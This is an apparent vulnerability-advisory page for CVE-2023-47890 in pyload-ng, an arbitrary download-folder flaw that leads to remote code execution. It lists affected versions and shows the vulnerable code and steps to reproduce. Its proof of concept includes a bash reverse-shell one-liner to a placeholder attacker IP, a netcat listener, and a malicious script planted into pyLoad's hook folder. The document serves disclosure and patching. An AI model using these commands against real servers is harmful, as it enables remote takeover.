Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS1oNzNtLXBjZnctMjVoMs4AA3S3

High EPSS: 0.00262% (0.49407 Percentile) EPSS:
Permalink JSON

Download to arbitrary folder can lead to RCE

Affected Packages Affected Versions Fixed Versions
pypi:pyload-ng
PURL: pkg:pypi/pyload-ng
< 0.5.0b3.dev75 0.5.0b3.dev75
1 Dependent packages
1 Dependent repositories
2,845 Downloads last month

Affected Version Ranges

All affected versions

0.5.0a5.dev528, 0.5.0a5.dev532, 0.5.0a5.dev535, 0.5.0a5.dev536, 0.5.0a5.dev537, 0.5.0a5.dev539, 0.5.0a5.dev540, 0.5.0a5.dev545, 0.5.0a5.dev562, 0.5.0a5.dev564, 0.5.0a5.dev565, 0.5.0a6.dev570, 0.5.0a6.dev578, 0.5.0a6.dev587, 0.5.0a7.dev596, 0.5.0a8.dev602, 0.5.0a9.dev615, 0.5.0a9.dev629, 0.5.0a9.dev632, 0.5.0a9.dev641, 0.5.0a9.dev643, 0.5.0a9.dev655, 0.5.0a9.dev806, 0.5.0b1.dev1, 0.5.0b1.dev2, 0.5.0b1.dev3, 0.5.0b1.dev4, 0.5.0b1.dev5, 0.5.0b2.dev9, 0.5.0b2.dev10, 0.5.0b2.dev11, 0.5.0b2.dev12, 0.5.0b3.dev13, 0.5.0b3.dev14, 0.5.0b3.dev17, 0.5.0b3.dev18, 0.5.0b3.dev19, 0.5.0b3.dev20, 0.5.0b3.dev21, 0.5.0b3.dev22, 0.5.0b3.dev24, 0.5.0b3.dev26, 0.5.0b3.dev27, 0.5.0b3.dev28, 0.5.0b3.dev29, 0.5.0b3.dev30, 0.5.0b3.dev31, 0.5.0b3.dev32, 0.5.0b3.dev33, 0.5.0b3.dev34, 0.5.0b3.dev35, 0.5.0b3.dev38, 0.5.0b3.dev39, 0.5.0b3.dev40, 0.5.0b3.dev41, 0.5.0b3.dev42, 0.5.0b3.dev43, 0.5.0b3.dev44, 0.5.0b3.dev45, 0.5.0b3.dev46, 0.5.0b3.dev47, 0.5.0b3.dev48, 0.5.0b3.dev49, 0.5.0b3.dev50, 0.5.0b3.dev51, 0.5.0b3.dev52, 0.5.0b3.dev53, 0.5.0b3.dev54, 0.5.0b3.dev57, 0.5.0b3.dev60, 0.5.0b3.dev62, 0.5.0b3.dev64, 0.5.0b3.dev65, 0.5.0b3.dev66, 0.5.0b3.dev67, 0.5.0b3.dev68, 0.5.0b3.dev69, 0.5.0b3.dev70, 0.5.0b3.dev71, 0.5.0b3.dev72, 0.5.0b3.dev73, 0.5.0b3.dev74

All unaffected versions

0.5.0b3.dev75, 0.5.0b3.dev76, 0.5.0b3.dev77, 0.5.0b3.dev78, 0.5.0b3.dev79, 0.5.0b3.dev80, 0.5.0b3.dev81, 0.5.0b3.dev82, 0.5.0b3.dev85, 0.5.0b3.dev87, 0.5.0b3.dev88, 0.5.0b3.dev89, 0.5.0b3.dev90, 0.5.0b3.dev91, 0.5.0b3.dev92, 0.5.0b3.dev93

Summary

A web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts.

Details

When a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a filter is applied to make sure it can't traverse directories and stays within /downloads.

src/pyload/core/api/init.py::add_package::L432

  folder = (
      folder.replace("http://", "")
      .replace("https://", "")
      .replace(":", "")
      .replace("/", "_")
      .replace("\\", "_")
  )

So if a package were created with the name "../" the application would instead create the folder "/downloads/.._/"

However, when editing packages there is no prevention in place and a user can just pick any arbitrary directory in the filesystem.

src/pyload/webui/app/blueprints/json_blueprint.py::edit_package::L195

  id = int(flask.request.form["pack_id"])
  data = {
      "name": flask.request.form["pack_name"],
      "_folder": flask.request.form["pack_folder"],
      "password": flask.request.form["pack_pws"],
  }

  api.set_package_data(id, data)

Steps to reproduce

  1. Login to a pyLoad instance
  2. Go to "Queue" and create a new package with any name and a valid link
  3. Click "Edit Package" on the newly created package and set the folder as "/config/scripts/download_finished/"
  4. Restart the package
  5. Check the server filesystem and note the link was downloaded and stored inside "/config/scripts/download_finished/"

Remote code execution proof-of-concept

It is possible to use this issue to abuse scripts and gain remote control over the pyLoad server.

On attacker machine

  1. Start a web server hosting a malicious script
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh&1
sudo python3 -m http.server 80
  1. Start netcat listener for reverse shells
nc -vklp 9999

On pyLoad

  1. Change pyLoad file permission settings

    Change permissions of downloads: On
    Permission mode for downloaded files: 0744

  2. Create a package with link pointing to the attacker

    http://<attacker_ip>/evil.sh

  3. Edit package and change folder to /config/scripts/package_deleted/

  4. Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad

  5. Delete any package package to trigger the script

Impact

An authenticated user can gain control over the underlying pyLoad server.

References:

Identifiers

GHSA-h73m-pcfw-25h2

CVE-2023-47890

Risk

Severity

High

EPSS

EPSS Percentage: 0.00262

EPSS Percentile: 0.49407

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/pyload/pyload

Date and time

Published

about 2 years ago

Updated

16 days ago

API

JSON